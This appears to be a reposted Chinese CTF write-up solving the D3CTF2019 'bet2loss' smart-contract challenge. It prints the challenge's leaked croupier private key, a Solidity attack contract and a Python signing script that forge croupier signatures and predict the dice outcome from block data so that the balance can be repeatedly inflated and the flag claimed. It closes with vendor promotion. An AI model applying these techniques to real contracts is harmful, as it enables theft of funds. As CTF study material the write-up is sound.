【智能合约】D3CTF2019-bet2loss
2022-9-28 15:0:49 Author: 雷神众测(查看原文) 阅读量:11 收藏

STATEMENT

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

案例描述

croupier ⽤户账户和私钥泄露:

address:0xACB7a6Dc0215cFE38e7e22e3F06121D2a1C42f6C privatekey:6F08D741943990742381E1223446553A63B38A3AA86BEEF1E9FC5FCF61E66D12

分析过程

源码分析

获取flag的条件:

balances[msg.sender] = balances[msg.sender].sub(300000); 也就是要求 msg.sender 的 balance > 300000,⼀看这个合约,函数调⽤关系其实不复杂,复杂的是有 ⼀堆 require 检查条件。这些检查条件的知识点都不难,叠加起来就脑阔疼。

1、⼀看有点像薅羊毛,AirdropCheck() 函数中新⽤户就可以有 1000 balance。但 sendFunds() 函数定 义为 private,不能直接调⽤来进⾏转账操作,再看 settleBetCommon() 函数中调⽤了 sendFunds() 函 数,但也是定义为 private。不过好在settleBet() 函数定义为 external 类型,其中调⽤了 settleBetCommon() 函数。

所以,想要执⾏转账,需要调⽤ settleBet() 函数,调⽤关系:settleBet()-> settleBetCommon()- >sendFunds()

2、条件 msg.sender != croupier 这个我们随便满⾜,条件 isContract(msg.sender)==false,我们只要 是普通⽤户或者把函数调⽤逻辑写在攻击合约的构造函数中都可以满⾜,但是有参数涉及到 block.number,所以还是写攻击合约更为合适。

require (msg.sender != croupier, "croupier cannot bet with himself."); require (isContract(msg.sender)==false, "Only bet with real people.");

下⾯的检查条件,难点在于⽤需要从签名信息中恢复出 croupier 的地址,不过 croupier 的 private key 已经知道,多⼏步复杂的签名计算可以得出 v,r,s。

3、在下⾯的那些代码中,可以得出 placeBet() 函数中的前⼏个参数值,⼀个⼀个按照顺序来。

bytes32 entropy = keccak256(abi.encodePacked(reveal, placeBlockNumber)); uint dice = uint(entropy) % modulo; if (dice == betnumber){   diceWin = diceWinAmount; } # 得到 betnumber betnumber = uint(keccak256(abi.encodePacked(reveal, placeBlockNumber))) % modulo;require (modulo > 1 && modulo <= MAX_MODULO, "modulo should be within range."); # 1
require (wager >= MIN_BET && wager <= MAX_BET, "wager should be within range."); require (wager != 0, "Bet should be in an 'active' state"); # 1<=wager<=1000 //取最⼤值计算 getDiceWinAmount(wager, modulo) 得到最⼤的转 账数量

按照理论来讲,commitLastBlock 只要⼤于或等于获取到的 block.number 都⾏,不过在链上区块在不 断增加,所以 commitLastBlock 要选的⽐ block.number ⼤多⼀些。

require (block.number <= commitLastBlock, "Commit has expired."); # commitLastBlock = block.number or block.number + x [1

⽐较重要的⼀点,为了在 settleBet() 函数中使⽤到 Bet storage bet = bets[commit]; 的数据,commit 和 reveal 必须满⾜下⾯的条件,reveal 是⼀个随机值。

uint commit = uint(keccak256(abi.encodePacked(reveal))); Bet storage bet = bets[commit]; #得到 commit commit = uint(keccak256(abi.encodePacked(reveal))); [reveal 可以是⼀个随机值]

解决办法

payload

pragma solidity ^0.4.23;interface Bet2Loss{    function placeBet(uint8, uint8, uint40, uint40, uint, bytes32,bytes32, uint8) external;    function PayForFlag() external;}contract Attack{    uint8 public betnumber;    uint8 public modulo = 100; //1<modulo<=100 //取最⼤值计算getDiceWinAmount(wager, modulo) 得到最⼤的转账数量    uint40 public wager = 1000; //取最⼤值计算 getDiceWinAmount(wager,modulo) 得到最⼤的转账数量    uint public commit;    uint public reveal = 10010;  //随机数    address public target = 0x724517A39a5B87F7DBc3C5cD2a783Fb20b59Ab1c;
constructor(uint40 commitLastBlock, bytes32 r, bytes32 s, uint8 v)public{ betnumber = uint8(uint(keccak256(abi.encodePacked(reveal,uint40(block.number)))) % uint(modulo)); commit = uint(keccak256(abi.encodePacked(reveal)));
Bet2Loss(target).placeBet(betnumber, modulo, wager,commitLastBlock, commit, r, s, v); } function get_flag() public{ Bet2Loss(target).PayForFlag(); }}

python部分payload

from eth_abi import packedcroupier = '0xACB7a6Dc0215cFE38e7e22e3F06121D2a1C42f6C'private_key ='0x6F08D741943990742381E1223446553A63B38A3AA86BEEF1E9FC5FCF61E66D12'reveal = 10010modula = 100commitLastBlock = w3.eth.block_number + 250 # uint40print('commitLastBlock', commitLastBlock)'''# soliditycommit = uint(keccak256(abi.encodePacked(reveal))) #uintbytes32 signatureHash = keccak256(abi.encodePacked(commitLastBlock,commit))require (croupier == ecrecover(signatureHash, v, r, s)'''commit = packed.encode_abi_packed(['uint256'],[reveal]).hex()commit = int.from_bytes(w3.sha3(hexstr=commit),'big')Hash = '0x' + packed.encode_abi_packed(['uint40','uint256'],[commitLastBlock,commit]).hex()signatureHash = w3.sha3(hexstr=Hash).hex()result = w3.eth.account.signHash(signatureHash, private_key=private_key)print('r:',hex(result['r']))print('s:',hex(result['s']))print('v:',result['v'])'''commitLastBlock 263r: 0x191141135315c35103422b8302add3145a73793c2a9c8ee4866b600d4f4e819bs: 0x32c23629c9172382175602e028fabe5ddfa3341a3c1fe3f082f482a3aeec69f1v: 28'''

攻击实验

1、这⾥是使⽤ Remix 在本地环境复现,所以需要先部署 Bet2Loss 合约。

2、执⾏脚本获取到 commitLastBlock,r,s,v 的值。

3、输⼊获取到的 commitLastBlock,r,s,v 值,部署 Attack 合约。

4、接下来在 Bet2Loss 合约中的 settleBet 函数赋值 reveal=10010 并执⾏,执⾏成功后可以看到 balance 已经有了100000。

0x6E67B3700A0062Eb1A090dA29010B6E4086cA0bD 为 Attack 合约地址。

5、继续执⾏多⼏次 Bet2Loss 合约中的 settleBet 函数,balance >= 300000 即可,接下来可以获取 flag。

注意事项

在操作的过程中,遇到的问题:

nonce 在签名交易时值不对,因为当前重值了 geth-cli 环境,所以和 Metamask 中记录的不⼀样,重置 geth-cli 环境后对应账户的 nonce 为 0,⽽ Metamask 因为历史记录的值为 2(也就是发送过2笔交易)。

所以,在 Metamak 中重设账户即可解决。

安恒信息

杭州亚运会网络安全服务官方合作伙伴

成都大运会网络信息安全类官方赞助商

武汉军运会、北京一带一路峰会

青岛上合峰会、上海进博会

厦门金砖峰会、G20杭州峰会

支撑单位北京奥运会等近百场国家级

重大活动网络安保支撑单位

END

长按识别二维码关注我们


文章来源: http://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&mid=2652499856&idx=1&sn=0ef2f73e6b5ae8714a1d68cad8ceb79d&chksm=f2584c23c52fc5357acc5b0ee53711204d0505702198bfb035e2f9b91d06787b3b6d41db97a2#rd
如有侵权请联系:admin#unsafe.sh